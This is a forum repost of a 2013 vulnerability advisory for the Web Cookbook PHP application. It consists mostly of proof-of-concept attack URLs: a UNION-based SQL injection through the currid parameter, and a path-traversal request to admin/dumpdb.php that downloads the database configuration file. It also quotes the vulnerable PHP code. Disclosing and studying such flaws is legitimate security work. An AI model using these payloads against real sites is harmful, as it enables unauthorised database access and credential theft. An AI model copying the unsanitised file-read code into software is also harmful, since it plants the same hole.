Praetorian503 Posted February 21, 2013 Report Posted February 21, 2013 Web Cookbook suffers from file disclosure and remote SQL injection vulnerabilities.# Web Cookbook Multiple Vulnerability# By cr4wl3r http://bastardlabs.info# Script: http://sourceforge.net/projects/webcookbook/# Tested: Win 7# Proof of Concept# SQL Injectionhttp://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi]http://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10--# Remote File Disclosure# Bugs found /admin/dumpdb.php--------------------------1 <?php2 $outfile = $_GET['outfile'];3 header("Content-Type: text/plain");4 header("Content-length: " . filesize("../upload/" . $outfile));5 header("Content-Disposition: attachment; filename=" . $outfile);6 readfile("../upload/" . $outfile);7 ?>--------------------------http://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file]http://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php# Demo:http://bastardlabs.info/demo/WebCookbook1.pnghttp://bastardlabs.info/demo/WebCookbook2.pngSource: PacketStorm Quote
